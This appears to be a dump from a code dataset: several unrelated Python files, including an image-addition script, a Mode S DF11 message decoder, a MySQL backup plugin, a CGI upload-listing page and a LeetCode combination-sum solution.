if 0 <= tmp_r <= 255:
return_red.append(tmp_r)
else:
return_red.append(tmp_r % 255) # loop values around if saturation
if 0 <= tmp_g <= 255:
return_green.append(tmp_g)
else:
return_green.append(tmp_g % 255) # loop values around if saturation
if 0 <= tmp_b <= 255:
return_blue.append(tmp_b)
else:
return_blue.append(tmp_b % 255) # loop values around if saturation
return return_red, return_green, return_blue
else:
print "Error: image dimensions do not match!"
def main(): # test case
print('start!!!!!')
ima = ImgIO.ImgIO()
imb = ImgIO.ImgIO()
ima.read_image("y.jpg")
imb.read_image("test1.png")
add_r, add_g, add_b = add(ima, imb)
imc = ImgIO.ImgIO()
imc.read_list(add_r, add_g, add_b, "final1.png", ima.width, ima.height)
imc.write_image("final1.png")
if __name__ == '__main__':
main()
|
"""
Decode all-call reply messages, with downlink format 11
"""
from pyModeS import common
def _checkdf(func):
"""Ensure downlink format is 11."""
def wrapper(msg):
df = common.df(msg)
if df != 11:
raise RuntimeError(
"Incorrect downlink format, expect 11, got {}".format(df)
)
return func(msg)
return wrapper
@_checkdf
def icao(msg):
"""Decode transponder code (ICAO address).
Args:
msg (str): 14 hexdigits string
Returns:
string: ICAO address
"""
return common.icao(msg)
@_checkdf
def interrogator(msg):
"""Decode interrogator identifier code.
Args:
msg (str): 14 hexdigits string
Returns:
int: interrogator identifier code
"""
# the CRC remainder contains the CL and IC field. top three bits are CL field and last four bits are IC field.
remainder = common.crc(msg)
if remainder > 79:
IC = "corrupt IC"
elif remainder < 16:
IC="II"+str(remainder)
else:
IC="SI"+str(remainder-16)
return IC
@_checkdf
def capability(msg):
"""Decode transponder capability.
Args:
msg (str): 14 hexdigits string
Returns:
int, str: transponder capability, description
"""
msgbin = common.hex2bin(msg)
ca = common.bin2int(msgbin[5:8])
if ca == 0:
text = "level 1 transponder"
elif ca == 4:
text = "level 2 transponder, ability to set CA to 7, on ground"
elif ca == 5:
text = "level 2 transponder, ability to set CA to 7, airborne"
elif ca == 6:
text = "evel 2 transponder, ability to set CA to 7, either airborne or ground"
elif ca == 7:
text = "Downlink Request value is 0,or the Flight Status is 2, 3, 4 or 5, either airborne or on the ground"
else:
text = None
return ca, text
|
from typing import List
class Message(object):
class Origin(object):
servername: str
nickname: str
username: str
hostname: str
command: str
origin: Origin
params: List[str]
|
"""pybackup - Backup Plugin for MySQL Database
"""
import os
from pybackup import errors
from pybackup import utils
from pybackup.logmgr import logger
from pybackup.plugins import BackupPluginBase
from pysysinfo.mysql import MySQLinfo
__author__ = "Ali Onur Uyar"
__copyright__ = "Copyright 2011, Ali Onur Uyar"
__credits__ = []
__license__ = "GPL"
__version__ = "0.5"
__maintainer__ = "Ali Onur Uyar"
__email__ = "aouyar at gmail.com"
__status__ = "Development"
class PluginMySQL(BackupPluginBase):
"""Class for backups of MySQL Database.
"""
_extOpts = {'filename_dump_db': 'Filename for MySQL dump files.',
'db_host': 'MySQL Database Server Name or IP.',
'db_port': 'MySQL Database Server Port.',
'db_user': 'MySQL Database Server User.',
'db_password': 'MySQL Database Server Password.',
'db_list': 'List of databases. (All databases by default.)',}
_extReqOptList = ()
_extDefaults = {'cmd_mysqldump': 'mysqldump',
'filename_dump_db': 'mysql_dump',}
def __init__(self, global_conf, job_conf):
"""Constructor
@param global_conf: Dictionary of general configuration options.
@param job_conf: Dictionary of job configuration options.
"""
BackupPluginBase.__init__(self, global_conf, job_conf)
self._connArgs = []
for (opt, key) in (('-h', 'db_host'),
('-P', 'db_port'),
('-u', 'db_user')):
val = self._conf.get(key)
if val is not None:
self._connArgs.extend([opt, val])
self._env = os.environ.copy()
db_password = self._conf.get('db_password')
if db_password is not None:
self._env['MYSQL_PWD'] = db_password
def dumpDatabase(self, db, data=True):
if data:
dump_type = 'data'
dump_desc = 'MySQL Database Contents'
else:
dump_type = 'db'
dump_desc = 'MySQL Database Container'
dump_filename = "%s_%s_%s.dump.%s" % (self._conf['filename_dump_db'],
db, dump_type,
self._conf['suffix_compress'])
dump_path = os.path.join(self._conf['job_path'], dump_filename)
args = [self._conf['cmd_mysqldump'],]
args.extend(self._connArgs)
if db in ('information_schema', 'mysql'):
args.append('--skip-lock-tables')
if not data:
args.extend(['--no-create-info', '--no-data' ,'--databases'])
args.append(db)
logger.info("Starting dump of %s: %s"
" Backup: %s", dump_desc, db, dump_path)
returncode, out, err = self._execBackupCmd(args, #@UnusedVariable
self._env,
out_path=dump_path,
out_compress=True)
if returncode == 0:
logger.info("Finished dump of %s: %s"
" Backup: %s", dump_desc, db, dump_path)
else:
raise errors.BackupError("Dump of %s for %s failed "
"with error code: %s"
% (dump_desc, db, returncode),
*utils.splitMsg(err))
def dumpDatabases(self):
if not self._conf.has_key('db_list'):
try:
my = MySQLinfo(host=self._conf.get('db_host'),
port=self._conf.get('db_port'),
user=self._conf.get('db_user'),
password=self._conf.get('db_password'))
self._conf['db_list'] = my.getDatabases()
del my
except Exception, e:
raise errors.BackupError("Connection to MySQL Server "
"for querying database list failed.",
"Error Message: %s" % str(e))
logger.info("Starting dump of %d MySQL Databases.",
len(self._conf['db_list']))
for db in self._conf['db_list']:
self.dumpDatabase(db, False)
self.dumpDatabase(db, True)
logger.info("Finished dump of MySQL Databases.")
def dumpFull(self):
self.dumpDatabases()
description = "Plugin for backups of MySQL Database."
methodList = (('mysql_dump_full', PluginMySQL, 'dumpFull'),
('mysql_dump_databases', PluginMySQL, 'dumpDatabases'),)
|
import os
import glob
import cgi
import PrintPages_test as pt
address = cgi.escape(os.environ["REMOTE_ADDR"])
script = "Main Model Form"
pt.write_log_entry(script, address)
pt.print_header('GrowChinook', 'Std')
pt.print_full_form(None, None, 'in', 'RunModel.py')
extension = 'csv'
os.chdir('uploads')
result = [i for i in glob.glob('*.csv')]
print('''
{}
</div>
</body>
'''.format(result))
print ('</html>')
|
class Solution(object):
@staticmethod
def dfs(candidates, target, vis, res, cur_idx, sum):
if sum > target:
return
if sum == target:
ans = [candidates[i] for i in cur_idx if i >= 0]
res.append(ans)
return
if sum < target:
for i, v in enumerate(candidates):
if sum + v > target:
break
if i != cur_idx[-1] + 1 and candidates[i] == candidates[i-1]:
continue
if i >= cur_idx[-1] and (not vis[i]):
vis[i] = 1
cur_idx.append(i)
Solution.dfs(candidates, target, vis, res, cur_idx, sum+v)
vis[i] = 0
cur_idx.pop()
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
candidates = sorted(candidates)
n = len(candidates)
res = []
cur_idx = [-1]
vis = [0 for _ in candidates]
Solution.dfs(candidates, target, vis, res, cur_idx, 0)
return res
s = Solution()
print s.combinationSum2([10,1,2,7,6,1,5], 8)
print s.combinationSum2([2,5,2,1,2], 5)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.